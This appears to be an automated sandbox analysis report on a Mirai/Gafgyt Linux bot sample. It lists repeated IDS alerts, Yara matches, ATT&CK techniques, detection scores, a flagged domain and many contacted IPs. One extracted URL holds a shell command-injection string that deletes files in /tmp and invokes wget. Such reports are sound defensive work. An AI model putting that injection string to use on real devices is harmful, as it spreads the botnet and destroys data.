          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: Yara matchFile source: x86.elf, type: SAMPLE
          Source: Yara matchFile source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86.elf PID: 6220, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86.elf PID: 6222, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567853 Sample: x86.elf Startdate: 03/12/2024 Architecture: LINUX Score: 100 20 197.179.229.36, 37215, 59534 SAFARICOM-LIMITEDKE Kenya 2->20 22 scamanje.stresserit.pro 2->22 24 99 other IPs or domains 2->24 26 Suricata IDS alerts for network traffic 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Antivirus / Scanner detection for submitted sample 2->30 32 6 other signatures 2->32 8 x86.elf 2->8         started        signatures3 process4 process5 10 x86.elf 8->10         started        process6 12 x86.elf 10->12         started        14 x86.elf 10->14         started        16 x86.elf 10->16         started        18 x86.elf 10->18         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          x86.elf74%ReversingLabsLinux.Trojan.Mirai
          x86.elf100%AviraEXP/ELF.Gafgyt.T
          x86.elf100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          scamanje.stresserit.pro
          unknown
          unknowntrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+true
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/x86.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/x86.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  96.107.74.61
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  156.158.98.17
                  unknownTanzania United Republic of
                  37133airtel-tz-asTZfalse
                  156.13.131.6
                  unknownNew Zealand
                  22192SSHENETUSfalse
                  91.199.115.183
                  unknownRussian Federation
                  44387REEDLAN-ASRUfalse
                  144.79.65.48
                  unknownunknown
                  24940HETZNER-ASDEfalse
                  47.241.21.87
                  unknownUnited States
                  45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                  172.15.102.177
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  156.124.100.128
                  unknownUnited States
                  393504XNSTGCAfalse
                  165.108.36.235
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  197.195.235.255
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  156.241.59.24
                  unknownSeychelles
                  136800XIAOZHIYUN1-AS-APICIDCNETWORKUSfalse
                  41.68.48.229
                  unknownEgypt
                  24835RAYA-ASEGfalse
                  197.221.180.254
                  unknownSouth Africa
                  37356O-TelZAfalse
                  129.207.231.73
                  unknownUnited States
                  1970TAMUS-NETUSfalse
                  202.15.27.29
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  197.71.38.214
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  41.140.123.146
                  unknownMorocco
                  36903MT-MPLSMAfalse
                  48.223.118.31
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  190.163.193.226
                  unknownChile
                  22047VTRBANDAANCHASACLfalse
                  41.226.143.43
                  unknownTunisia
                  37705TOPNETTNfalse
                  197.153.12.99
                  unknownMorocco
                  36925ASMediMAfalse
                  36.235.241.16
                  unknownTaiwan; Republic of China (ROC)
                  3462HINETDataCommunicationBusinessGroupTWfalse
                  13.231.235.109
                  unknownUnited States
                  16509AMAZON-02USfalse
                  197.4.54.10
                  unknownTunisia
                  5438ATI-TNfalse
                  111.57.201.5
                  unknownChina
                  9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                  211.43.132.170
                  unknownKorea Republic of
                  17584ICE-AS-KRInchonMetropolitanOfficeOfEducationKRfalse
                  1.49.41.6
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  191.176.179.103
                  unknownBrazil
                  28573CLAROSABRfalse
                  174.55.235.165
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  112.38.33.216
                  unknownChina
                  24444CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompanyfalse
                  197.149.52.166
                  unknownMadagascar
                  37054Telecom-MalagasyMGfalse
                  197.113.54.103
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  156.92.88.7
                  unknownUnited States
                  10695WAL-MARTUSfalse
                  178.26.2.80
                  unknownGermany
                  31334KABELDEUTSCHLAND-ASDEfalse
                  211.93.186.135
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  152.95.104.68
                  unknownDenmark
                  224UNINETTUNINETTTheNorwegianUniversityResearchNetworkfalse
                  202.43.102.123
                  unknownMalaysia
                  45785TECHAVENUE-APTechAvenueMalaysiaMYfalse
                  42.227.192.105
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  176.5.65.175
                  unknownGermany
                  12638AS12638DuesseldorfDEfalse
                  121.103.100.236
                  unknownJapan2527SO-NETSo-netEntertainmentCorporationJPfalse
                  185.41.19.240
                  unknownNorway
                  199900ASN-BEDSYSNOfalse
                  161.141.173.104
                  unknownCanada
                  17311ECMC-BGPUSfalse
                  175.145.68.66
                  unknownMalaysia
                  4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                  197.217.236.106
                  unknownAngola
                  11259ANGOLATELECOMAOfalse
                  202.234.102.69
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  208.8.223.133
                  unknownUnited States
                  1239SPRINTLINKUSfalse
                  197.144.26.135
                  unknownMorocco
                  36884MAROCCONNECTMAfalse
                  197.197.89.63
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  197.43.225.199
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  138.97.77.179
                  unknownunknown
                  264139WORLDINFORMATICALTDABRfalse
                  207.122.65.2
                  unknownUnited States
                  3356LEVEL3USfalse
                  107.96.38.183
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  156.51.42.235
                  unknownSweden
                  29975VODACOM-ZAfalse
                  197.220.141.96
                  unknownLesotho
                  33567TELECOM-LESOTHOLSfalse
                  135.172.178.6
                  unknownUnited States
                  14962NCR-252USfalse
                  212.217.192.135
                  unknownSweden
                  12501NORRNODITSSEfalse
                  197.214.107.242
                  unknownNigeria
                  198504LU1AEfalse
                  27.191.234.176
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  197.240.131.159
                  unknownunknown
                  37705TOPNETTNfalse
                  156.26.242.114
                  unknownUnited States
                  22245WICHITA-STATE-UUSfalse
                  197.179.229.36
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEtrue
                  45.177.125.116
                  unknownEcuador
                  267881SAOREDESCIALTDASAOHOSTINGECfalse
                  156.55.64.30
                  unknownUnited States
                  20746ASN-IDCTNOOMINCITfalse
                  117.117.228.202
                  unknownChina
                  4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                  41.215.4.12
                  unknownKenya
                  15808ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKEfalse
                  114.202.170.6
                  unknownKorea Republic of
                  9318SKB-ASSKBroadbandCoLtdKRfalse
                  197.226.240.76
                  unknownMauritius
                  23889MauritiusTelecomMUfalse
                  203.214.148.66
                  unknownAustralia
                  7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                  41.239.218.33
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  173.133.29.194
                  unknownUnited States
                  10507SPCSUSfalse
                  207.150.127.190
                  unknownUnited States
                  2914NTT-COMMUNICATIONS-2914USfalse
                  125.47.143.167
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  53.132.254.10
                  unknownGermany
                  31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                  220.228.27.68
                  unknownTaiwan; Republic of China (ROC)
                  9919NCIC-TWNewCenturyInfoCommTechCoLtdTWfalse
                  144.170.24.233
                  unknownUnited States
                  721DNIC-ASBLK-00721-00726USfalse
                  129.3.48.78
                  unknownUnited States
                  14433SUNY-OSWEGO-ASNUSfalse
                  32.123.173.77
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  41.157.30.27
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  45.186.75.136
                  unknownBrazil
                  269414AssainetProvedordeInternetLtdaBRfalse
                  205.19.207.188
                  unknownUnited States
                  2914NTT-COMMUNICATIONS-2914USfalse
                  197.153.85.37
                  unknownMorocco
                  36925ASMediMAfalse
                  41.172.44.194
                  unknownSouth Africa
                  36937Neotel-ASZAfalse
                  179.186.113.6
                  unknownBrazil
                  18881TELEFONICABRASILSABRfalse
                  12.57.188.148
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  156.214.187.251
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  53.113.208.175
                  unknownGermany
                  31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                  156.56.236.206
                  unknownUnited States
                  87INDIANA-ASUSfalse
                  78.223.122.228
                  unknownFrance
                  12322PROXADFRfalse
                  201.25.31.164
                  unknownBrazil
                  8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                  64.88.120.8
                  unknownUnited States
                  26463MISD-NETUSfalse
                  52.138.131.111
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  65.201.108.203
                  unknownUnited States
                  701UUNETUSfalse
                  156.185.191.4
                  unknownEgypt
